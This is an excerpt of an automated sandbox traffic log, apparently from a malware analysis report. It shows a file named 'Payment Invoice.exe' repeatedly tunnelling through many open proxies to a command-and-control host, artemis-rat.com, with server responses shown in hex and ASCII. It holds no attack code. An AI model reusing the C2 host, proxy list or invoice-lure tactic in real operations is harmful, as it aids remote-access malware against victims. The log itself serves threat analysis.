                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                107192.168.2.45025131.43.179.214807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.640238047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.794617891 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                108192.168.2.45024266.225.246.23880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.641433954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                109192.168.2.450155190.153.121.241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.642750978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                110192.168.2.45007714.103.24.2080007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.642915010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.235333920 CET59INHTTP/1.1 200 Connection Established
                                                                Proxy-agent: nginx


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                111192.168.2.450089202.179.184.4454307076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.647660017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                112192.168.2.450197162.241.53.72573647076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.650408030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                113192.168.2.450268104.17.171.235807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.651948929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.807004929 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                114192.168.2.450303172.67.181.129807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.680870056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.835481882 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                115192.168.2.450282172.67.182.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.680955887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.835822105 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                116192.168.2.45019067.213.212.50592687076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.681025028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.969136000 CET24INHTTP/1.1 200 #string


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                117192.168.2.450313104.17.166.210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.682605028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.836806059 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                118192.168.2.45020972.10.164.178134777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.684278011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.642530918 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                119192.168.2.450291162.214.225.223405367076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.684556007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.167293072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.729834080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.839188099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214529991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.511740923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                120192.168.2.450051111.8.155.5477777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.684767962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.526680946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.975311995 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                121192.168.2.450274162.214.165.6426247076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.686697960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.167449951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.729886055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.886471033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.183382034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480356932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.777256012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.277179003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.240377903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                122192.168.2.450230199.102.107.14541457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.686852932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                123192.168.2.45011714.103.24.14880007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.692672968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                124192.168.2.45010549.228.131.16950007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.694969893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                125192.168.2.45027337.187.77.58107107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.696242094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                126192.168.2.45009793.171.220.22988887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.716941118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.511018991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                127192.168.2.4497768.209.255.1331287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.717195988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.679094076 CET38INHTTP/1.1 200 OK
                                                                content-length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                128192.168.2.450128146.59.18.246409757076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.721949100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                129192.168.2.45030412.176.231.147807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.722498894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.928941011 CET169INHTTP/1.0 400 Bad request
                                                                cache-control: no-cache
                                                                content-type: text/html
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                130192.168.2.450331104.18.161.122807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.729346991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.883378029 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                131192.168.2.450181212.110.188.222344117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.729976892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.370418072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.245407104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.089345932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.589740038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.089584112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
